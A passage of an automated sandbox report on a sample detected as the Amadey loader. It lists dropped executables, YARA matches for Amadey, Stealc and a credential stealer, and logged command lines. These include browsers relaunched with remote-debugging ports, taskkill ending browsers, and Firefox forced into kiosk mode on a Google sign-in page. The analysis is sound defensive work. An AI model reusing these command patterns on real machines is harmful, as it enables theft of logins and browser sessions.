2024-12-16 10:05:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:05:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:05:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	05:02:17
Start date:	16/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xd70000
File size:	3'042'304 bytes
MD5 hash:	215688FC3175B17C270C29FE33195914
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2064441142.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:02:19
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0xfb0000
File size:	3'042'304 bytes
MD5 hash:	215688FC3175B17C270C29FE33195914
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2085433951.0000000004870000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2129775105.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:02:20
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xfb0000
File size:	3'042'304 bytes
MD5 hash:	215688FC3175B17C270C29FE33195914
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2134494920.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2093661123.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:03:00
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xfb0000
File size:	3'042'304 bytes
MD5 hash:	215688FC3175B17C270C29FE33195914
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2485792183.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	05:03:10
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe"
Imagebase:	0x4e0000
File size:	727'552 bytes
MD5 hash:	28E568616A7B792CAC1726DEB77D9039
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:03:10
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:03:14
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe"
Imagebase:	0x4e0000
File size:	727'552 bytes
MD5 hash:	28E568616A7B792CAC1726DEB77D9039
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:03:14
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe"
Imagebase:	0x4e0000
File size:	727'552 bytes
MD5 hash:	28E568616A7B792CAC1726DEB77D9039
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	05:03:14
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe"
Imagebase:	0x4e0000
File size:	727'552 bytes
MD5 hash:	28E568616A7B792CAC1726DEB77D9039
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:03:22
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe"
Imagebase:	0xf50000
File size:	4'485'120 bytes
MD5 hash:	9A1A8278DE829A8B0430E9EB10174992
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	05:03:35
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe"
Imagebase:	0x960000
File size:	4'434'944 bytes
MD5 hash:	178C04A423C791C51C0D91ED1177DBCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	05:03:41
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe"
Imagebase:	0x400000
File size:	393'728 bytes
MD5 hash:	DFD5F78A711FA92337010ECC028470B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	05:03:49
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe"
Imagebase:	0x150000
File size:	1'889'280 bytes
MD5 hash:	385F0024661E626AD70879FA9EE43036
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3221132708.000000000132E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3220821695.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3220361028.000000000132D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3220821695.000000000132D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3220361028.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3221209371.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	05:04:00
Start date:	16/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	05:04:01
Start date:	16/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2356,i,7633164809811582900,3596112793272210248,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	05:04:01
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe"
Imagebase:	0x150000
File size:	1'889'280 bytes
MD5 hash:	385F0024661E626AD70879FA9EE43036
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000003.3352890856.0000000001252000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000003.3356052850.000000000126C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000003.3288752753.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000003.3300305625.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000003.3392719887.000000000126D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	05:04:04
Start date:	16/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	05:04:04
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe"
Imagebase:	0xe90000
File size:	1'854'976 bytes
MD5 hash:	6B7CCA5A323F5E7087052DBE58F4C15A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000015.00000002.3230900745.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000015.00000003.3138251493.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000015.00000002.3232792590.0000000000E91000.00000040.00000001.01000000.00000015.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	05:04:05
Start date:	16/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2532,i,6020324080176508680,18240390168964363109,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	05:04:11
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe"
Imagebase:	0x150000
File size:	1'889'280 bytes
MD5 hash:	385F0024661E626AD70879FA9EE43036
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	05:04:12
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe"
Imagebase:	0x5d0000
File size:	964'608 bytes
MD5 hash:	687BBF73E7B900FF5D46C6C2D23C6A40
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	05:04:15
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0x3f0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	05:04:15
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	05:04:16
Start date:	16/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	05:04:18
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM chrome.exe /T
Imagebase:	0x3f0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	05:04:18
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	05:04:18
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM msedge.exe /T
Imagebase:	0x3f0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	05:04:18
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	05:04:18
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM opera.exe /T
Imagebase:	0x3f0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	05:04:19
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	05:04:19
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe"
Imagebase:	0xe90000
File size:	1'854'976 bytes
MD5 hash:	6B7CCA5A323F5E7087052DBE58F4C15A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000022.00000003.3299677003.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000022.00000002.3390011704.000000000080B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000022.00000002.3393637637.0000000000E91000.00000040.00000001.01000000.00000015.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	05:04:19
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM brave.exe /T
Imagebase:	0x3f0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	05:04:19
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	05:04:20
Start date:	16/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	05:04:21
Start date:	16/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	05:04:22
Start date:	16/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	05:04:22
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe"
Imagebase:	0xc0000
File size:	2'786'816 bytes
MD5 hash:	17839CF1DD548DBB64EC23E644A475E0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	05:04:24
Start date:	16/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2176 -parentBuildID 20230927232528 -prefsHandle 2096 -prefMapHandle 2088 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6311108f-34b2-4f01-81aa-d1551b4bf54b} 6548 "\\.\pipe\gecko-crash-server-pipe.6548" 269cc26bf10 socket
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	05:04:27
Start date:	16/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4136 -parentBuildID 20230927232528 -prefsHandle 4120 -prefMapHandle 3988 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e098c10-026b-4d67-9a0e-8d34b4933270} 6548 "\\.\pipe\gecko-crash-server-pipe.6548" 269dd097210 rdd
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	05:04:27
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe"
Imagebase:	0x5d0000
File size:	964'608 bytes
MD5 hash:	687BBF73E7B900FF5D46C6C2D23C6A40
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	05:04:31
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0x3f0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	05:04:31
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	05:04:36
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe
Wow64 process (32bit):
Commandline:	"C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe"
Imagebase:
File size:	2'786'816 bytes
MD5 hash:	17839CF1DD548DBB64EC23E644A475E0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	05:04:40
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe
Wow64 process (32bit):
Commandline:	"C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe"
Imagebase:
File size:	2'786'816 bytes
MD5 hash:	17839CF1DD548DBB64EC23E644A475E0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	05:04:43
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe
Wow64 process (32bit):
Commandline:	"C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe"
Imagebase:
File size:	1'854'976 bytes
MD5 hash:	6B7CCA5A323F5E7087052DBE58F4C15A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	05:04:47
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	2'786'816 bytes
MD5 hash:	17839CF1DD548DBB64EC23E644A475E0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.7%
Total number of Nodes:	767
Total number of Limit Nodes:	16

Executed Functions

Function 00DA652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00DA652A,?,?,?,?,?,00DA7661), ref: 00DA6566

Memory Dump Source

Source File: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true

Associated: 00000000.00000002.2105569511.0000000000D70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105586602.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105646406.0000000000DD9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105663731.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105682169.0000000000DE5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105698429.0000000000DE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105714881.0000000000DE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105813544.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105833222.0000000000F3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
